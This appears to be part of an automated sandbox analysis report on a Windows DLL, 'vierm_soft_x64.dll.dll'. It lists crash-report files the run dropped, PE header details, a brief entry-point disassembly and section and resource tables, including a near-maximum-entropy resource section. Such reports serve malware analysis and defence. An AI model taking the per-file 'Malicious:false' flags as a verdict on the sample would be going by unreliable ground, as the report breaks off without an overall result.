                                                                                                                                                                                                                      SHA1:524207053F60E6A70ABF95ECF8747C510F1FDE75
                                                                                                                                                                                                                      SHA-256:164C37ADFE36B0E77401623A26C95863323E53357E224985CF76786BFD71BF64
                                                                                                                                                                                                                      SHA-512:AEF9F7E99D4341548C30E2B88C57004F2D9D0A26FADAEE7FDD7AB296C975E57D20C76CF2F6C32B0ED2F06BAC63F54448526883F8925EB3FA7726714F0BB5FA8E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>7376</Pi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4794
                                                                                                                                                                                                                      Entropy (8bit):4.492390562531089
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VY/Ym8M4JCECyJFAgjyq85muQZBptSTSDd:uIjfwwI7FQ7VjJ0gjpZBpoODd
                                                                                                                                                                                                                      MD5:8F46B4F144DA74D9B85F9317F2B5AC28
                                                                                                                                                                                                                      SHA1:12E68D1F42BBB47CA73BA9CBD41A7826D5F61DA1
                                                                                                                                                                                                                      SHA-256:C5E6B73D4943D1603B32CBF219F10D4EA7ABCC8F39A7285C35A5259B67240E71
                                                                                                                                                                                                                      SHA-512:A8801A1A7D69198BF82B08D23C3D362CB04949CFC681F8DDF30A77E8E499AA6A00C5F5FD80E72FD04B9464359F40B76E2E6009733D8747BBCE8D2D95866E552E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:00 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):56812
                                                                                                                                                                                                                      Entropy (8bit):1.5839522802611306
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:QC870LOMpSBS3xkop+BY6yg4uDRDSJSmh+K:qISoSI3zpOygjDgAmh+
                                                                                                                                                                                                                      MD5:70BBE510900F7C11904E20A030F35912
                                                                                                                                                                                                                      SHA1:6BE9EF462D7F1C0FEA85C5035F51A105E30D6DA4
                                                                                                                                                                                                                      SHA-256:ABF3CFAF70481732A5CDDCA545F9D40E3E62753B3EAC50665BFF64A37F672DC1
                                                                                                                                                                                                                      SHA-512:342764BAB3A872BE96BA0FD1B54D64B88ACB464E1268DD070BA8531C06A98DB809AD791D0EDB1DC832B5C022C326A5E28720F1ABF62BA91FB6A4BB4D598647C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8794
                                                                                                                                                                                                                      Entropy (8bit):3.706398318166195
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJQhqUv6YEFwLwygmf19TprM89bMLjfIkm:R6lXJWqUv6YEclgmf193MvfK
                                                                                                                                                                                                                      MD5:C78DA9EC8BDD916D0400D32C0879CFFD
                                                                                                                                                                                                                      SHA1:B16D622F4FB8C466C3E34DE5D2B19E9419C30534
                                                                                                                                                                                                                      SHA-256:10BF40F7D31BE00795D8044B3EF166611BD83C95DE3AA74C7DE56A3ADE7B26C0
                                                                                                                                                                                                                      SHA-512:DE1EE361F6F1175CC155B41B4B5496614915272CB9514ABB7BF8654E42BEAD23D54225EFDEAF2AE436D37792EC9F649B603952EB25164DE48434331C632BD4B0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>7468</Pi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4794
                                                                                                                                                                                                                      Entropy (8bit):4.492928908184564
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYLYm8M4JCECydFlyq85muTptSTShqd:uIjfwwI7FQ7V3JFCpoOhqd
                                                                                                                                                                                                                      MD5:67EB87ACB5405A702CA51007E14D61AB
                                                                                                                                                                                                                      SHA1:07B2611A6C3E3C411F2C984FE3F0C7BE05685DBF
                                                                                                                                                                                                                      SHA-256:AA7367638F223B27F7E5FC188070E7536752353266949AA066C07CDED7BB1A4F
                                                                                                                                                                                                                      SHA-512:55C93CA8451B62207499E109A7CD5B27156A416914B7FB3F1E12AAAC97F91F255E25E8F8D2DE23B35F94E37F263DFAE5D8D556D2E7F47C37F021B48310F0356E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:04 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):46780
                                                                                                                                                                                                                      Entropy (8bit):1.4455306649150355
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:k5F8KOMT/4MmS5HuS4bz+++zSGncL1+Ie:hV0/lf5H3494CI3
                                                                                                                                                                                                                      MD5:554187D2D452FB77E3802B525B552AE0
                                                                                                                                                                                                                      SHA1:0D1AFF52C1A24A73C65DCEC234ED06B7BF98C75F
                                                                                                                                                                                                                      SHA-256:581989EC2DF32E60C7F01676358110F66CABCDDDCF497E792B9082CEB233055B
                                                                                                                                                                                                                      SHA-512:6D11C356CBCC75BD376EC3CD1708AED61043BEFA4039D56169A5A624C23CA48BFEB3B494BC65FEAEBEA475E96CD5BB4D9DAD1BDE7CE2774AFD4712CB49A20237
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:04 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):55852
                                                                                                                                                                                                                      Entropy (8bit):1.6107554078755504
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:kr8/KOMNV1SjPStFT/F2449pa0SkSDvPWOK:RtsVMjPm5F/4ChDvv
                                                                                                                                                                                                                      MD5:849DEE7EB121FB9FE9F03D5FB32020EB
                                                                                                                                                                                                                      SHA1:E296DF7D08675B52F5402092F88BD49DB7039FBF
                                                                                                                                                                                                                      SHA-256:421CA0FF6B055B5C41005AE12D67B10FE7DDDA0E5098655F0D5046ACCC2349AA
                                                                                                                                                                                                                      SHA-512:E38E668A839C58D658B7CE714A7CBD8021DE151B6E964587DA611CC6ED005B20B86EA4080DC80C391B506AD6720F1EE21398C3C0CEE945E99EA96EAF1819772A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8892
                                                                                                                                                                                                                      Entropy (8bit):3.7043833394305232
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJIAeUCz6YEOQs5JgmfI3ZApDu89boXjfo1Ym:R6lXJneUQ6YEDs5JgmfI3kozfof
                                                                                                                                                                                                                      MD5:9DF31998EF74829F07568A4843055537
                                                                                                                                                                                                                      SHA1:B0E27DCD732E28C59E94D5014ACF04C90ACD0F69
                                                                                                                                                                                                                      SHA-256:78D590A89DFF96B279B8A1214B91C6C4E34D4AE88DD8802C3A0B0232800C770C
                                                                                                                                                                                                                      SHA-512:7A5BD316CE84C2E6606A1715AFE87FE0EB4FC07554CD201CBD04D6C3CD766F07C830FE5F5585CB6B0B66911EE3E1601C52E305DB656D6C909B72DF43A54B44A4
                                                                                                                                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7596</Pi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8780
                                                                                                                                                                                                                      Entropy (8bit):3.7067724462814247
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJOoPUB6YEOQ65Jgmf19Tpr989bo7jfDYm:R6lXJ5PUB6YED65Jgmf19Uo/fZ
                                                                                                                                                                                                                      MD5:45EF2E64D232A9EB737669670F4902D6
                                                                                                                                                                                                                      SHA1:4D7AB65F31DF36311DFDB4400AC261C6CC10147C
                                                                                                                                                                                                                      SHA-256:15D15F1489EB0FD664617C879534315CCD49E4E2FFA7813A37741CCB172513BC
                                                                                                                                                                                                                      SHA-512:91BC7581D906A79B3A38B21A3480D024A44845A1A5372B20DC7AB67DC770788C2E429848CAFFBE0CADBC40C3656F4AF94B2676BEC467DAC9E88CA6860FEF61E7
                                                                                                                                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7620</Pi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4794
                                                                                                                                                                                                                      Entropy (8bit):4.4908688384737685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYcYm8M4JCECydFcyq85muIptSTSOd:uIjfwwI7FQ7VMJ85poOOd
                                                                                                                                                                                                                      MD5:CC5C990C0CE16F846DAF0A6CDC8EEBA8
                                                                                                                                                                                                                      SHA1:9AF812000D0BE7B3A6B87FCC2CDA1CEF75289F1F
                                                                                                                                                                                                                      SHA-256:DE8787F5DC592370D64A51CD99DBA9FD2E4267A1C24195A8112C7152723927E8
                                                                                                                                                                                                                      SHA-512:29853EB95758A6F05A9573CC55238F938B8A15C56EB97789ECA868EF3FBDA14FA0D943B70179FC38A50130F9D2942D835F8E19DEFC6812CA46E49E358ADDFDEF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4941
                                                                                                                                                                                                                      Entropy (8bit):4.508338811786524
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYHYm8M4JCECyTOXFGiyq8vhyTODptSTSQd:uIjfwwI7FQ7VHJLCWGopoOQd
                                                                                                                                                                                                                      MD5:AE1F43150139907FD50E5F9F8C5DDCDE
                                                                                                                                                                                                                      SHA1:4B28573E9E52B9DB3E2448EBD294F1AF71E66036
                                                                                                                                                                                                                      SHA-256:0156EA178C51D92716FF3E7DEDD3F27955C674CE1BA9E5C2A9168F358F16D520
                                                                                                                                                                                                                      SHA-512:273C9E3FF07665D0CC1BD754E86AF024218215419CB5BBC27B831F7CD2AC2D697B6C32C869DF96243945BC8B8C9B45656B502324986E69A3829B428514EA43C2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                      Entropy (8bit):4.394706535925689
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:Fl4fiJoH0ncNXiUjt10qCG/gaocYGBoaUMMhA2NX4WABlBuNAfOBSqa:b4vFCMYQUMM6VFYSfU
                                                                                                                                                                                                                      MD5:85F6B0FFD5794480B2795A7A5CCE4C2E
                                                                                                                                                                                                                      SHA1:E9A23DE5B5E6B3CDFA981AEA95B224775F053539
                                                                                                                                                                                                                      SHA-256:38D311305E96D3A212FF619D9C920E0C1BEA8D319E039C1BBA56B03F75804888
                                                                                                                                                                                                                      SHA-512:C7CF25B0C6F8348FB42876BD31E37B72C4B1489214617AF7A600B095D5C1D1CCA32FCB2ED53781321A3D464DC0D0600A05296E9EE4C3DB138DFC8ACBD466CA1C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Entropy (8bit):7.207925663165308
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                                                                                      File name:vierm_soft_x64.dll.dll
                                                                                                                                                                                                                      File size:767'488 bytes
                                                                                                                                                                                                                      MD5:b1ca25f5bb4edd293b3711c77eb99a6f
                                                                                                                                                                                                                      SHA1:178bba8686ea329b884a652fe0f8a0ae0c53d367
                                                                                                                                                                                                                      SHA256:97a6331239d451d7dfe15bfe17de8b419df741ae68bacd440808f8b8d3f99b8a
                                                                                                                                                                                                                      SHA512:d5a282a8f81e117b79616c44a260d89c7fee06f4ac1387675bc79c3bd7599a5d49fbe3d8fb3d4d42eea81a17564abc2d42288bc2dc468d1b16ed633ba421b32d
                                                                                                                                                                                                                      SSDEEP:12288:/h/M5nsxW5fFcrGn7Q21Svj07MGpmeSM6q4LWYv1AoMJPPyogk31OkRK1OKeQeq:/rD+JPPn8kM1Oej
                                                                                                                                                                                                                      TLSH:6FF4BF17B3A016F0E477D23ACA638E56FAF1F8194720AB9703D4457A5F233A05A7E316
                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................Y........................G.......G.......G......Y.......Y.......Y........G.......G.......G.......G......Rich...
                                                                                                                                                                                                                      Icon Hash:7ae282899bbab082
                                                                                                                                                                                                                      Entrypoint:0x1800059a0
                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                      Imagebase:0x180000000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT
                                                                                                                                                                                                                      Time Stamp:0x66D197BD [Fri Aug 30 09:58:21 2024 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                      Import Hash:d3f19c8462acea3b286599d6db4d7d49
                                                                                                                                                                                                                      Signature Valid:
                                                                                                                                                                                                                      Signature Issuer:
                                                                                                                                                                                                                      Signature Validation Error:
                                                                                                                                                                                                                      Error Number:
                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                          Version:
                                                                                                                                                                                                                          Thumbprint MD5:
                                                                                                                                                                                                                          Thumbprint SHA-1:
                                                                                                                                                                                                                          Thumbprint SHA-256:
                                                                                                                                                                                                                          Serial:
                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          dec esp
                                                                                                                                                                                                                          mov dword ptr [esp+18h], eax
                                                                                                                                                                                                                          mov dword ptr [esp+10h], edx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 18h
                                                                                                                                                                                                                          mov eax, dword ptr [esp+28h]
                                                                                                                                                                                                                          mov dword ptr [esp], eax
                                                                                                                                                                                                                          cmp dword ptr [esp], 01h
                                                                                                                                                                                                                          je 00007F6B447F3384h
                                                                                                                                                                                                                          jmp 00007F6B447F338Eh
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov eax, dword ptr [esp+20h]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [000709DBh], eax
                                                                                                                                                                                                                          mov eax, 00000001h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 18h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 38h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov ecx, 00000004h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov eax, 00001000h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov edx, dword ptr [esp+40h]
                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                          call dword ptr [00059616h]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+20h], eax
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov eax, dword ptr [esp+20h]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 38h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov eax, 00008000h
                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov ecx, dword ptr [esp+30h]
                                                                                                                                                                                                                          call dword ptr [000595CCh]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+10h], edx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 78h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov eax, 00000030h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          lea edx, dword ptr [esp+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x71ec0 | 0x7c | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x71f3c | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7e000 | 0x43658 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x77000 | 0x43e0 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x77e48 | 0x2ae0 | .pdata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0xbfc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6bac0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6b980 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x5f000 | 0x2c8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5d430 | 0x5d600 | f43a6c57e01f650d32296d61179a38ac | False | 0.38046456659973227 | data | 6.435385904060212 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x5f000 | 0x13880 | 0x13a00 | c836ba80b7dbeff7fbaafd67c248d71c | False | 0.33770402070063693 | data | 4.904622064540347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x73000 | 0x3488 | 0x1600 | 4cc463ba256074f0958932d503e4ff11 | False | 0.27183948863636365 | data | 3.2682578107497506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x77000 | 0x43e0 | 0x4400 | 5fcb7922b16d53ed29bb4546ae76ab14 | False | 0.5199908088235294 | data | 5.839976526132865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
memcpy_ | 0x7c000 | 0x108 | 0x200 | 7cc962e1169cff2db25b02cd1fd7336d | False | 0.314453125 | data | 1.882359889865335 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x7d000 | 0x1f4 | 0x200 | c4640c710b0a9d40f7ffe8a09755e862 | False | 0.533203125 | data | 4.170309507475893 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x7e000 | 0x43658 | 0x43800 | f37d386203e2a88b03aed287db6c8adb | False | 0.9627712673611111 | data | 7.9878717901772145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc2000 | 0xbfc | 0xc00 | 4e41657c3e5d7264ce75ff68c9b05721 | False | 0.3785807291666667 | data | 5.42143048602152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_DLGINCLUDE | 0x7e058 | 0x43600 | data |  |  | 0.9643364448051948
DLL | Import
